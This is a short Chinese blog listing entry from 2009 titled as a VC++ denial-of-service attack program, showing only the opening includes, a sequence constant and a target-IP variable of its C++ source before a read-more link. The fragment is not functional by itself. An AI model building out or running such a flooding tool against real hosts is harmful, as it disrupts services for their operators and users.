VC++ DOS攻击程序
摘要:
#include <winsock2.h> #include <Ws2tcpip.h> #include <stdio.h> #pragma comment(lib,"ws2_32.lib") #define SEQ 0x28376839 int threadnum,maxthread,port; char *DestIP;//目标IP void display... 阅读全文
posted @ 2009-07-23 19:46 Lori^^Cheung 阅读(399) 评论(0) 推荐(0)